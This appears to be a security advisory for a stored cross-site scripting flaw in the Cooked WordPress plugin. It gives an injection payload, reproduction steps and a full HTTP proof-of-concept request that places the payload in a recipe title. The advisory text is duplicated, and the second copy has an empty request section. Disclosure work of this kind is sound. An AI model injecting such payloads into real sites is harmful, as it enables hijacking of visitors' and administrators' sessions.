Description:
The Cooked plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the ‘post_title’ parameter in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page.
Payload:
RE:<img src=x onerror=alert(origin);//
Steps to reproduce:
[0] Install & activate the plugin.
[1] Add a recipe ‘/wp-admin/post-new.php?post_type=cp_recipe’.
[2] Use your payload in the RECIPE TITLE input field and fill in the VIDEO URL (Gallery tab > ‘_recipe_settings[gallery][video_url]’) input field as well.
[3] Publish the recipe.
[4] Injected payload will trigger on the newly created recipe page.
Impact:
Malicious files upload, creating an account with administrator-level access, ability to completely compromise the targeted website.
PoC request:
POST /wp-admin/post.php HTTP/2
Host: target.tld
Cookie: [contributor_cookies]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0
_wpnonce=c3h1a3o3s7&user_ID=4&action=editpost&originalaction=editpost&post_author=4&post_type=cp_recipe&original_post_status=publish&post_ID=256&meta-box-order-nonce=c3h1a3o3s7&closedpostboxesnonce=c3h1a3o3s7&post_title=RE%3A%3Cimg+src%3Dx+onerror%3Dalert%28origin%29%3B%2F%2F&samplepermalinknonce=c3h1a3o3s7&content=%3Ch2%3ERE%3Aalert%28origin%29%3B%3C%2Fh2%3E%0D%0A%3Ch3%3EIngredients%3C%2Fh3%3E%0D%0A%3Cdiv+class%3D%22cooked-recipe-ingredients%22%3E%3C%2Fdiv%3E%0D%0A%3Ch3%3EDirections%3C%2Fh3%3E%0D%0A%3Cdiv+class%3D%22cooked-recipe-directions%22%3E%3C%2Fdiv%3E&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=06&jj=10&aa=2024&hh=04&mn=21&ss=05&hidden_mm=06&cur_mm=06&hidden_jj=10&cur_jj=10&hidden_aa=2024&cur_aa=2024&hidden_hh=04&cur_hh=04&hidden_mn=21&cur_mn=23&original_publish=Update&save=Update&tax_input%5Bcp_recipe_category%5D%5B%5D=0&tax_input%5Bcp_recipe_category%5D%5B%5D=24&tax_input%5Bcp_recipe_category%5D%5B%5D=25&tax_input%5Bcp_recipe_category%5D%5B%5D=23&newcp_recipe_category=New+Category+Name&newcp_recipe_category_parent=-1&_ajax_nonce-add-cp_recipe_category=c3h1a3o3s7&_thumbnail_id=-1&_recipe_settings%5Bcooked_version%5D=1.7.15.4&_recipe_settings%5Bcontent%5D=%3Cp%3E%5Bcooked-info+left%3D%22author%2Ctaxonomies%2Cdifficulty%22+right%3D%22print%2Cfullscreen%22%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-excerpt%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-image%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-info+left%3D%22servings%22+right%3D%22prep_time%2Ccook_time%2Ctotal_time%22%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-ingredients%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-directions%5D%3C%2Fp%3E%0D%0A%3Cp%3E%5Bcooked-gallery%5D%3C%2Fp%3E&_recipe_settings%5Bexcerpt%5D=&_recipe_settings%5Bseo_description%5D=&_recipe_settings%5Bdifficulty_level%5D=0&_recipe_settings%5Bprep_time%5D=&_recipe_settings%5Bcook_time%5D=&_recipe_settings%5Btotal_time%5D=&_recipe_settings%5Bingredients%5D%5B9929571%5D%5Bamount%5D=&_recipe_settings%5Bingredients%5D%5B9929571%5D%5Bmeasurement%5D=&_recipe_settings%5Bingredients%5D%5B9929571%5D%5Bname%5D=&_recipe_settings%5Bdirections%5D%5B7912515%5D%5Bimage%5D=&_recipe_settings%5Bdirections%5D%5B7912515%5D%5Bcontent%5D=&_recipe_settings%5Bnutrition%5D%5Bserving_size%5D=&_recipe_settings%5Bnutrition%5D%5Bservings%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories%5D=&_recipe_settings%5Bnutrition%5D%5Bcalories_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bfat%5D=&_recipe_settings%5Bnutrition%5D%5Bsat_fat%5D=&_recipe_settings%5Bnutrition%5D%5Btrans_fat%5D=&_recipe_settings%5Bnutrition%5D%5Bcholesterol%5D=&_recipe_settings%5Bnutrition%5D%5Bsodium%5D=&_recipe_settings%5Bnutrition%5D%5Bpotassium%5D=&_recipe_settings%5Bnutrition%5D%5Bcarbs%5D=&_recipe_settings%5Bnutrition%5D%5Bfiber%5D=&_recipe_settings%5Bnutrition%5D%5Bsugars%5D=&_recipe_settings%5Bnutrition%5D%5Bprotein%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_a%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_c%5D=&_recipe_settings%5Bnutrition%5D%5Bcalcium%5D=&_recipe_settings%5Bnutrition%5D%5Biron%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_d%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_e%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_k%5D=&_recipe_settings%5Bnutrition%5D%5Bthiamin%5D=&_recipe_settings%5Bnutrition%5D%5Briboflavin%5D=&_recipe_settings%5Bnutrition%5D%5Bniacin%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b6%5D=&_recipe_settings%5Bnutrition%5D%5Bfolate%5D=&_recipe_settings%5Bnutrition%5D%5Bvitamin_b12%5D=&_recipe_settings%5Bnutrition%5D%5Bbiotin%5D=&_recipe_settings%5Bnutrition%5D%5Bpantothenic_acid%5D=&_recipe_settings%5Bnutrition%5D%5Bphosphorus%5D=&_recipe_settings%5Bnutrition%5D%5Biodine%5D=&_recipe_settings%5Bnutrition%5D%5Bmagnesium%5D=&_recipe_settings%5Bnutrition%5D%5Bzinc%5D=&_recipe_settings%5Bnutrition%5D%5Bselenium%5D=&_recipe_settings%5Bnutrition%5D%5Bcopper%5D=&_recipe_settings%5Bnutrition%5D%5Bmanganese%5D=&_recipe_settings%5Bnutrition%5D%5Bchromium%5D=&_recipe_settings%5Bnutrition%5D%5Bmolybdenum%5D=&_recipe_settings%5Bnutrition%5D%5Bchloride%5D=&_recipe_settings%5Bgallery%5D%5Btype%5D=cooked&_recipe_settings%5Bgallery%5D%5Bvideo_url%5D=%23&cooked_recipe_custom_box_nonce=c3h1a3o3s7&advanced_view=1&comment_status=open&add_comment_nonce=c3h1a3o3s7&_ajax_fetch_list_nonce=c3h1a3o3s7&post_name=poc&post_author_override=4
Additional details:
Injected payload will trigger if the ‘_recipe_settings[gallery][video_url]’ parameter is specified.
re-alter Analyst
Description:
The Cooked plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the ‘post_title’ parameter in versions up to, and including, 1.7.15.4 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with contributor-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page.
Payload:
RE:<img src=x onerror=alert(origin);//
Steps to reproduce:
[0] Install & activate the plugin.
[1] Add a recipe ‘/wp-admin/post-new.php?post_type=cp_recipe’.
[2] Use your payload in the RECIPE TITLE input field and fill in the VIDEO URL (Gallery tab > ‘_recipe_settings[gallery][video_url]’) input field as well.
[3] Publish the recipe.
[4] Injected payload will trigger on the newly created recipe page.
Impact:
Malicious files upload, creating an account with administrator-level access, ability to completely compromise the targeted website.
PoC request:
Additional details:
Injected payload will trigger if the ‘_recipe_settings[gallery][video_url]’ parameter is specified.